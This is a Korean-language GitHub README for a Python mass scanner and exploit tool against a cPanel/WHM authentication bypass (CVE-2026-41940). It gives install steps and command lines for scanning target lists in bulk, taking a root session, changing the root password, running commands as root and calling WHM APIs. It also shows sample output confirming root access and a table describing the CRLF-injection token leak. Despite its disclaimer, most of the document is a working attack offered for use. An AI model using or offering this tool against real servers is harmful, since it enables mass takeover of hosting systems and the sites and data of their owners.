
cPanel/WHM CVE-2026-41940 - 대량 스캐너 & 익스플로이터
CVE-2026-41940용 cPanel/WHM 인증 우회 스캐너 및 익스플로잇 도구
이 도구는 교육 목적 및 승인된 보안 테스트 전용으로 제공됩니다.
이 도구를 사용함으로써 다음 사항에 동의하게 됩니다:
❗ 작성자는 이 도구 사용으로 인해 발생하는 어떠한 오용, 불법 행위, 손해 또는 법적 결과에 대해서도 책임지지 않습니다.
CVE-2026-41940은 유효한 자격 증명 없이 공격자가 무단으로 루트 수준 접근 권한을 획득할 수 있게 할 수 있는 cPanel/WHM의 치명적인 인증 우회 취약점입니다.
이 도구는 다음을 위한 Python 기반 구현을 제공합니다:
Python 3.7+
pip install requests urllib3
git clone https://github.com/Lutfifakee-Project/CVE-2026-41940.git
cd CVE-2026-41940
pip install -r requirements.txt
# Test with single target
python cpanel-mass-checker.py -u https://your-target.com:2087 -hostname your-target.com
# Single target
python cpanel-mass-checker.py -u https://target.com:2087
# Batch scan
python cpanel-mass-checker.py -f targets.txt -c 20
# Batch scan with port scanning
python cpanel-mass-checker.py -f targets.txt -c 20 --scan-ports -o results.txt
# Generate session URL
python cpanel-mass-checker.py -u https://target.com:2087 -session -hostname target.com
# Change root password
python cpanel-mass-checker.py -u https://target.com:2087 -passwd "NewPass123!" -hostname target.com
# Execute command (RCE)
python cpanel-mass-checker.py -u https://target.com:2087 -cmd "id" -hostname target.com
# WHM API call
python cpanel-mass-checker.py -u https://target.com:2087 -api listaccts -hostname target.com
targets.txt)# Lines starting with # are comments
https://target1.com:2087
target2.com
192.168.1.100
cpanel.example.com:2083
[*] Total: 4 targets (after dedup), concurrency: 10
[*] Port scanning: ON (2082, 2083, 2086, 2087)
------------------------------------------------------------
[2/4] [VULN] https://example.com:2087 - token=/cpsess1048057410
[1/4] [SAFE] safe-target.com
------------------------------------------------------------
[*] Scan completed. Vulnerable: 1
[+] Results saved to result.txt
[0] hostname = example.com
[1] minting a preauth session...
[2] sending the CRLF injection...
[3] firing do_token_denied...
[4] verifying WHM root access...
[+] WHM root access obtained!
[+] Session URL:
https://example.com:2087/cpsessXXXXXXX/
| 필드 | 값 |
|---|---|
| CVE | CVE-2026-41940 |
| 심각도 | 치명적 (CVSS 9.8) |
| 공격 경로 | 네트워크 |
| 요구 권한 | 없음 |
| 사용자 상호작용 | 없음 |
-hostname이 필요합니다안전하고 합법적인 테스트를 위해:
이 프로젝트가 도움이 되었다면 ⭐을 눌러주세요.
| 단계 | 설명 |
|---|
| 1. 사전 인증(Pre-authentication) | /login/에 잘못된 자격 증명을 보내 whostmgrsession 쿠키를 획득 |
| 2. CRLF 주입 | Authorization: Basic 헤더를 통해 줄바꿈을 주입하여 cpsess 토큰을 유출 |
| 3. 토큰 전파 | do_token_denied를 트리거하여 토큰을 캐시로 전파 |
| 4. 검증 | /json-api/version에 접근하여 WHM 루트 접근을 확인 |
| 기능 | 설명 |
|---|
| 🔄 일괄 스캔 | 여러 대상을 동시에 스캔 |
| 🎯 단일 대상 | 상세 출력과 함께 개별 대상 스캔 |
| 🔌 포트 스캔 | WHM 포트 자동 스캔 (2082, 2083, 2086, 2087) |
| 🔓 세션 URL | 원클릭 WHM 로그인 URL 생성 |
| 💀 RCE | 루트 권한으로 시스템 명령 실행 |
| 🔑 비밀번호 변경 | WHM 루트 비밀번호 수정 |
| 📡 WHM API 호출 | WHM API 함수 호출 |
| 🎨 색상 출력 | 결과의 시각적 출력 |
| 💾 결과 내보내기 | 취약한 대상을 파일로 저장 |
| 매개변수 | 설명 | 예시 |
|---|
| -u | 단일 대상 URL | -u https://target.com:2087 |
| -f | 대상 목록 파일 | -f targets.txt |
| -c | 동시성(스레드) | -c 20 |
| -o | 출력 파일 | -o results.txt |
| -hostname | 사용자 정의 Host 헤더 | -hostname cpanel.target.com |
| --scan-ports | 모든 WHM 포트 스캔 | --scan-ports |
| -session | 로그인 URL 생성 | -session |
| -passwd | 루트 비밀번호 변경 | -passwd "NewPass123" |
| -cmd | 명령 실행 | -cmd "id" |
| -keep | 임시 계정 유지 | -keep |
| -api | WHM API 호출 | -api listaccts |
| -api-params | API 매개변수 | -api-params "user=root,password=123" |